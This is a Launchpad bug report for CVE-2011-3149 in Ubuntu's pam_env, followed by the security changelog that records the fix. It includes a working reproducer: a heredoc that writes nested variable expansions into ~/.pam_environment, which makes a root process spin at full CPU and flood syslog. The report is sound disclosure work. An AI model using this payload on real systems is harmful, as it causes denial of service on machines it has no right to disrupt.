Ubuntu

100% CPU utilitization in pam_env parsing

Reported by Kees Cook on 2011-10-14
260
This bug affects 1 person
Affects Status Importance Assigned to Milestone
pam (Ubuntu)
Undecided
Unassigned

Bug Description

The pam_env variable expansion routine does not correctly abort under some situations when expending variable names. This triggers 100% CPU use and syslog flooding.

To reproduce:

cat <<EOM >~/.pam_environment

EVIL_FILLER_255 DEFAULT=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
EVIL_FILLER_256 DEFAULT=${EVIL_FILLER_255}B
EVIL_FILLER_1024 DEFAULT=${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}
EVIL_FILLER_8191 DEFAULT=${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_255}
EVIL_OVERFLOW_DOS DEFAULT=${EVIL_FILLER_8191}AAAA
EOM

This will trigger CPU usage for whatever process runs the PAM stack. For example, to make root run away, run "su - $USER" and correctly authenticate.

Marc Deslauriers (mdeslaur) wrote :

Please use CVE-2011-3149

Kees Cook (kees) wrote :

I've reported this privately to upstream; waiting for a reply.

Changed in pam (Ubuntu):
status: New → Triaged
Launchpad Janitor (janitor) wrote :

This bug was fixed in the package pam - 1.1.3-2ubuntu2.1

---------------
pam (1.1.3-2ubuntu2.1) oneiric-security; urgency=low

  * SECURITY UPDATE: possible code execution via incorrect environment file
    parsing (LP: #874469)
    - debian/patches-applied/CVE-2011-3148.patch: correctly count leading
      whitespace when parsing environment file in modules/pam_env/pam_env.c.
    - CVE-2011-3148
  * SECURITY UPDATE: denial of service via overflowed environment variable
    expansion (LP: #874565)
    - debian/patches-applied/CVE-2011-3149.patch: when overflowing, exit
      with PAM_BUF_ERR in modules/pam_env/pam_env.c.
    - CVE-2011-3149
  * SECURITY UPDATE: code execution via incorrect environment cleaning
    - debian/patches-applied/update-motd: updated to use clean environment
      and absolute paths in modules/pam_motd/pam_motd.c.
    - CVE-2011-XXXX
 -- Marc Deslauriers <email address hidden> Tue, 18 Oct 2011 09:33:47 -0400

Changed in pam (Ubuntu):
status: Triaged → Fix Released
visibility: private → public
visibility: private → public
To post a comment you must log in.
This report contains Public Security information  Edit
Everyone can see this security related information.

Other bug subscribers